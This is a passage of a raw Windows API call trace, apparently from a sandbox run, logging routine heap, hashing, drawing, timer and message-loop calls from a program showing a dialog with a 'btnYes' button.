(in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0163.852] GetFocus () returned 0x103e2 [0163.853] GetFocus () returned 0x103e2 [0163.853] GetFocus () returned 0x103e2 [0163.853] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.853] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.853] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.853] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.853] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.853] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.857] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f831a8 [0163.857] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.858] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.858] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.858] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.858] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.858] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.858] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.859] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f68 [0163.861] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.861] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83070 [0163.862] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f831a8 | out: hHeap=0x5e0000) returned 1 [0163.862] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f68 | out: hHeap=0x5e0000) returned 1 [0163.862] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83070 | out: hHeap=0x5e0000) returned 1 [0163.863] LsSetDoc () returned 0x0 [0163.863] LsCreateLine () returned 0x0 [0163.863] LsDisplayLine () returned 0x0 [0163.865] LsDestroyLine () returned 0x0 [0163.865] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0163.866] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83160 [0163.866] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0163.866] HashData (in: pbData=0x9f83164, cbData=0x4, pbHash=0x9f83168, cbHash=0x2 | out: pbHash=0x9f83168) returned 0x0 [0163.866] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.866] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0163.866] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.866] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.866] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.866] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.866] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0163.866] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83160 | out: hHeap=0x5e0000) returned 1 [0163.866] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.867] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.867] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0163.867] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0163.867] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0163.867] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0163.867] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7708 [0163.867] HashData (in: pbData=0x9f82f54, cbData=0x4, pbHash=0x9f82f58, cbHash=0x2 | out: pbHash=0x9f82f58) returned 0x0 [0163.867] HashData (in: pbData=0x6d7708, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d770a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d770c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.867] HashData (in: pbData=0x6d7714, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d771c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d7724, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d7726, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d7728, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d7730, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0163.867] HashData (in: pbData=0x6d773c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.867] HashData (in: pbData=0x6d7744, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.867] HashData (in: pbData=0x6d7750, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.867] HashData (in: pbData=0x6d7754, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.867] HashData (in: pbData=0x6d775c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.868] HashData (in: pbData=0x6d7768, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7708 | out: hHeap=0x5e0000) returned 1 [0163.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0163.868] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.868] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.868] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0163.868] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0163.868] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0163.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0163.869] _CIsqrt () returned 0x407b027f [0163.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0163.869] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.869] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.869] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0163.869] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd898 [0163.870] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.872] HashData (in: pbData=0xd94ae0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0163.873] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd898 | out: hHeap=0x5e0000) returned 1 [0163.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0163.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ed8 [0163.873] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7c48 [0163.873] HashData (in: pbData=0x9f82edc, cbData=0x4, pbHash=0x9f82ee0, cbHash=0x2 | out: pbHash=0x9f82ee0) returned 0x0 [0163.873] HashData (in: pbData=0x6d7c48, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c4a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c4c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c54, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c5c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c64, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c66, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c68, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c70, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c7c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c84, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c90, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c94, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.874] HashData (in: pbData=0x6d7c9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0163.874] HashData (in: pbData=0x6d7ca8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0163.874] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7c48 | out: hHeap=0x5e0000) returned 1 [0163.874] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ed8 | out: hHeap=0x5e0000) returned 1 [0163.874] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.874] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0163.874] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0163.874] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0163.874] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.875] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.875] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.875] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.875] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.875] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.875] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f38 [0163.876] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.876] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.876] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.876] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.876] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0163.876] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.876] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0163.877] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83070 [0163.878] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.878] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.878] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.879] GetSysColor (nIndex=15) returned 0xf0f0f0 [0163.879] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0163.880] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82fe0 [0163.881] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f38 | out: hHeap=0x5e0000) returned 1 [0163.881] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83070 | out: hHeap=0x5e0000) returned 1 [0163.881] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82fe0 | out: hHeap=0x5e0000) returned 1 [0163.887] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0163.898] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0163.899] BitBlt (hdc=0xb010541, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0163.899] ReleaseDC (hWnd=0x103e2, hDC=0xb010541) returned 1 [0163.900] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0163.900] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3098271923416) returned 1 [0163.901] DeleteObject (ho=0x22040a81) returned 1 [0163.901] GetCurrentThreadId () returned 0xb48 [0163.901] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0163.901] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098272039517) returned 1 [0163.901] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098272046241) returned 1 [0163.902] KillTimer (hWnd=0x30316, uIDEvent=0x2009) returned 1 [0163.904] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.904] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0163.904] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0163.904] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0163.904] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0163.904] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0163.904] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0163.904] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0163.904] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0163.904] QueryPerformanceCounter (in: lpPerformanceCount=0x19a3bc | out: lpPerformanceCount=0x19a3bc*=3098272334724) returned 1 [0163.905] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0163.905] NtdllDefWindowProc_W () returned 0x0 [0163.905] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.905] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0163.905] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0163.905] KillTimer (hWnd=0x30316, uIDEvent=0x200c) returned 1 [0163.906] QueryPerformanceCounter (in: lpPerformanceCount=0x19a26c | out: lpPerformanceCount=0x19a26c*=3098272470499) returned 1 [0163.906] QueryPerformanceCounter (in: lpPerformanceCount=0x19a23c | out: lpPerformanceCount=0x19a23c*=3098272477505) returned 1 [0163.906] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3098272488581) returned 1 [0163.906] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3098272495369) returned 1 [0163.906] SetEvent (hEvent=0x668) returned 1 [0163.907] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0163.907] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0163.907] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0163.907] GetWindowLongW (hWnd=0x103e2, nIndex=-21) returned 13702144 [0163.907] KillTimer (hWnd=0x103e2, uIDEvent=0x1000) returned 1 [0163.907] GetCurrentThreadId () returned 0xb48 [0163.907] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.084] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.084] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.084] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.129] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0164.129] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0164.129] KillTimer (hWnd=0x30316, uIDEvent=0x200b) returned 1 [0164.129] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0164.229] GetAsyncKeyState (vKey=17) returned 0 [0164.229] GetAsyncKeyState (vKey=16) returned 0 [0164.229] ScreenToClient (in: hWnd=0x103e2, lpPoint=0x19a0d0 | out: lpPoint=0x19a0d0) returned 1 [0164.229] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.229] memcpy_s (in: _Destination=0xd96120, _DestinationSize=0x118, _Source=0x19a118, _SourceSize=0x118 | out: _Destination=0xd96120) returned 0x0 [0164.229] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcea0 [0164.230] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.230] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.230] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x687d53a4, dwHighDateTime=0x1d7d80b)) [0164.231] GetTickCount () returned 0x1d73b36 [0164.231] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0164.231] IUnknown:Release (This=0xd6ab40) returned 0x7 [0164.231] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x687d6671, dwHighDateTime=0x1d7d80b)) [0164.231] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x687d6671, dwHighDateTime=0x1d7d80b)) [0164.231] GetTickCount () returned 0x1d73b36 [0164.231] GetCurrentThreadId () returned 0xb48 [0164.231] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.232] malloc (_Size=0xc) returned 0xc5fb00 [0164.232] GetCurrentThreadId () returned 0xb48 [0164.232] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.232] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.232] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.232] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.233] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.233] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.233] malloc (_Size=0x28) returned 0xc5d068 [0164.233] GetCurrentThreadId () returned 0xb48 [0164.233] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.233] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.233] IUnknown:Release (This=0xd6d900) returned 0x1 [0164.233] malloc (_Size=0x8c) returned 0xc82548 [0164.234] VirtualAlloc (lpAddress=0x9554000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x9554000 [0164.234] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.235] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.235] SetTimer (hWnd=0x103e2, nIDEvent=0x1000, uElapse=0x64, lpTimerFunc=0x0) returned 0x1000 [0164.235] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.235] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.236] IUnknown:Release (This=0xd6d940) returned 0x1 [0164.236] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.236] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.236] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.236] IUnknown:Release (This=0xd6ab40) returned 0x7 [0164.236] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.236] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.237] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0164.237] SysStringLen (param_1="btnYes") returned 0x6 [0164.237] GetCurrentThreadId () returned 0xb48 [0164.237] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x687e50e1, dwHighDateTime=0x1d7d80b)) [0164.237] GetTickCount () returned 0x1d73b36 [0164.237] SetEvent (hEvent=0x388) returned 1 [0164.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x687e8c17, dwHighDateTime=0x1d7d80b)) [0164.238] GetTickCount () returned 0x1d73b46 [0164.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x687e8c17, dwHighDateTime=0x1d7d80b)) [0164.239] free (_Block=0xc5d068) [0164.239] GetCurrentThreadId () returned 0xb48 [0164.239] GetCurrentThreadId () returned 0xb48 [0164.239] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.239] GetCurrentThreadId () returned 0xb48 [0164.240] GetCurrentThreadId () returned 0xb48 [0164.240] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.240] GetCurrentThreadId () returned 0xb48 [0164.240] GetCurrentThreadId () returned 0xb48 [0164.240] GetCurrentThreadId () returned 0xb48 [0164.240] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.240] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.240] memcpy_s (in: _Destination=0xd96240, _DestinationSize=0x118, _Source=0xd96120, _SourceSize=0x118 | out: _Destination=0xd96240) returned 0x0 [0164.241] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x14) returned 0x6dcee0 [0164.241] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.241] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcee0 | out: hHeap=0x5e0000) returned 1 [0164.241] LoadAcceleratorsW (hInstance=0x6d6d0000, lpTableName=0x28) returned 0x2900d3 [0164.242] CopyAcceleratorTableW (in: hAccelSrc=0x2900d3, lpAccelDst=0x0, cAccelEntries=0 | out: lpAccelDst=0x0) returned 13 [0164.242] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.242] CopyAcceleratorTableW (in: hAccelSrc=0x2900d3, lpAccelDst=0xd92640, cAccelEntries=13 | out: lpAccelDst=0xd92640) returned 13 [0164.242] LoadAcceleratorsW (hInstance=0x6d6d0000, lpTableName=0x30) returned 0x703a3 [0164.242] CopyAcceleratorTableW (in: hAccelSrc=0x703a3, lpAccelDst=0x0, cAccelEntries=0 | out: lpAccelDst=0x0) returned 2 [0164.242] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0164.242] CopyAcceleratorTableW (in: hAccelSrc=0x703a3, lpAccelDst=0xcfb720, cAccelEntries=2 | out: lpAccelDst=0xcfb720) returned 2 [0164.242] LoadAcceleratorsW (hInstance=0x6d6d0000, lpTableName=0x30) returned 0x703a3 [0164.242] CopyAcceleratorTableW (in: hAccelSrc=0x703a3, lpAccelDst=0x0, cAccelEntries=0 | 